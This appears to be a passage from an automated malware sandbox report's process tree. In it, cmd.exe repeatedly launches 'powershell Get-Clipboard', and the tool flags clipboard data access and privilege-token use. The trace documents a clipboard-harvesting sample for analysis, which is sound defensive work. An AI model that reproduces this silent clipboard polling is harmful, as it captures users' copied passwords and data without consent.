                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:868
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                            2⤵
                                                                              PID:2628
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Get-Clipboard
                                                                                3⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2264
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                              2⤵
                                                                                PID:3764
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Get-Clipboard
                                                                                  3⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4792
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                2⤵
                                                                                  PID:4540
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-Clipboard
                                                                                    3⤵
                                                                                    • Clipboard Data
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1544
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                  2⤵
                                                                                    PID:676
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Get-Clipboard
                                                                                      3⤵
                                                                                      • Clipboard Data
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2812
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                    2⤵
                                                                                      PID:1888
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-Clipboard
                                                                                        3⤵
                                                                                        • Clipboard Data
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3944
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                      2⤵
                                                                                      • Clipboard Data
                                                                                      PID:216
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-Clipboard
                                                                                        3⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4284
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                      2⤵
                                                                                      • Clipboard Data
                                                                                      PID:3144
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-Clipboard
                                                                                        3⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1660
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                      2⤵
                                                                                        PID:3892
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-Clipboard
                                                                                          3⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1000
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                        2⤵
                                                                                          PID:1668
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell Get-Clipboard
                                                                                            3⤵
                                                                                              PID:1004
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                            2⤵
                                                                                            • Clipboard Data
                                                                                            PID:1016
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-Clipboard
                                                                                              3⤵
                                                                                                PID:436
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                              2⤵
                                                                                                PID:768
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-Clipboard
                                                                                                  3⤵
                                                                                                    PID:3088
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                  2⤵
                                                                                                  • Clipboard Data
                                                                                                  PID:1344
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell Get-Clipboard
                                                                                                    3⤵
                                                                                                      PID:3400
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                    2⤵
                                                                                                    • Clipboard Data
                                                                                                    PID:4540
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell Get-Clipboard
                                                                                                      3⤵
                                                                                                      • Clipboard Data
                                                                                                      PID:4072
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                    2⤵
                                                                                                      PID:676
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell Get-Clipboard
                                                                                                        3⤵
                                                                                                          PID:864
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                        2⤵
                                                                                                          PID:1548
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Get-Clipboard
                                                                                                            3⤵
                                                                                                              PID:1640
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                            2⤵
                                                                                                            • Clipboard Data
                                                                                                            PID:2028
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Get-Clipboard
                                                                                                              3⤵
                                                                                                              • Clipboard Data
                                                                                                              PID:3444
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                            2⤵
                                                                                                              PID:632
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell Get-Clipboard
                                                                                                                3⤵
                                                                                                                  PID:2440
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                2⤵
                                                                                                                • Clipboard Data
                                                                                                                PID:3892
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell Get-Clipboard
                                                                                                                  3⤵
                                                                                                                    PID:3512
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                  2⤵
                                                                                                                    PID:3192
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Get-Clipboard
                                                                                                                      3⤵
                                                                                                                        PID:4956
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                      2⤵
                                                                                                                        PID:4412
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-Clipboard
                                                                                                                          3⤵
                                                                                                                            PID:4968
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                          2⤵
                                                                                                                          • Clipboard Data
                                                                                                                          PID:4672
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell Get-Clipboard
                                                                                                                            3⤵
                                                                                                                            • Clipboard Data
                                                                                                                            PID:1436
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                          2⤵
                                                                                                                            PID:748
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell Get-Clipboard
                                                                                                                              3⤵
                                                                                                                                PID:2268
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                              2⤵
                                                                                                                              • Clipboard Data
                                                                                                                              PID:2516
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell Get-Clipboard
                                                                                                                                3⤵
                                                                                                                                  PID:1888
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                2⤵
                                                                                                                                  PID:3024
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell Get-Clipboard
                                                                                                                                    3⤵
                                                                                                                                      PID:4928
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                    2⤵
                                                                                                                                      PID:320
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell Get-Clipboard
                                                                                                                                        3⤵
                                                                                                                                          PID:4976
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                        2⤵
                                                                                                                                        • Clipboard Data
                                                                                                                                        PID:3548
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell Get-Clipboard
                                                                                                                                          3⤵
                                                                                                                                            PID:2060
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                          2⤵
                                                                                                                                            PID:392
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell Get-Clipboard
                                                                                                                                              3⤵
                                                                                                                                              • Clipboard Data
                                                                                                                                              PID:5048
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                            2⤵
                                                                                                                                              PID:3788
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                3⤵
                                                                                                                                                  PID:2628
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                2⤵
                                                                                                                                                  PID:4488
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                    3⤵
                                                                                                                                                    • Clipboard Data
                                                                                                                                                    PID:1692
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                  2⤵
                                                                                                                                                  • Clipboard Data
                                                                                                                                                  PID:4312
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2316
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2952
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell Get-Clipboard
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2372
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2412
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell Get-Clipboard
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4740
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:432
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3416
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                2⤵
                                                                                                                                                                • Clipboard Data
                                                                                                                                                                PID:1836
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell Get-Clipboard
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3444
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2080
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell Get-Clipboard
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4912
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:468
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell Get-Clipboard
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1872
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2128
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell Get-Clipboard
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Clipboard Data
                                                                                                                                                                              PID:2944
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Clipboard Data
                                                                                                                                                                            PID:2676
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell Get-Clipboard
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Clipboard Data
                                                                                                                                                                              PID:3588
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5000
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4732
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Clipboard Data
                                                                                                                                                                                PID:2700
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell Get-Clipboard
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Clipboard Data
                                                                                                                                                                                  PID:1632
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3952
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Clipboard Data
                                                                                                                                                                                    PID:1184
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3024
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell Get-Clipboard
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Clipboard Data
                                                                                                                                                                                      PID:4800
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5084
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell Get-Clipboard
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:320
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1952
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell Get-Clipboard
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1688
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3212
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Clipboard Data
                                                                                                                                                                                                PID:3844
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4956
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell Get-Clipboard
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3788
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Clipboard Data
                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:3148
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2976
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell Get-Clipboard
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Clipboard Data
                                                                                                                                                                                                        PID:212
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3872
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell Get-Clipboard
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4940
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:368
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell Get-Clipboard
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4920
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4448
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell Get-Clipboard
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4224
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3228
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell Get-Clipboard
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3992
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3012
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell Get-Clipboard
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3640
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3844
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell Get-Clipboard
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Clipboard Data
                                                                                                                                                                                                                              PID:2212
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4300
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Clipboard Data
                                                                                                                                                                                                                                PID:2452
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2708
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell Get-Clipboard
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1784
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Clipboard Data
                                                                                                                                                                                                                                  PID:3960
                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Clipboard Data
                                                                                                                                                                                                                                    PID:3988
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3116
                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell Get-Clipboard
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1548
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:3208
                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell Get-Clipboard
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:3184
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4976
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell Get-Clipboard
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Clipboard Data
                                                                                                                                                                                                                                              PID:2080
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2628
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3460
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2504
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4900
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4640
                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell Get-Clipboard
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:3504
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Clipboard Data
                                                                                                                                                                                                                                                        PID:2028
                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell Get-Clipboard
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:1912
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:1660
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell Get-Clipboard
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:2008
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:3164
                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  powershell Get-Clipboard
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:1432
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3132
                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell Get-Clipboard
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:2908
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Clipboard Data
                                                                                                                                                                                                                                                                      PID:4120
                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell Get-Clipboard
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Clipboard Data
                                                                                                                                                                                                                                                                        PID:3512
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
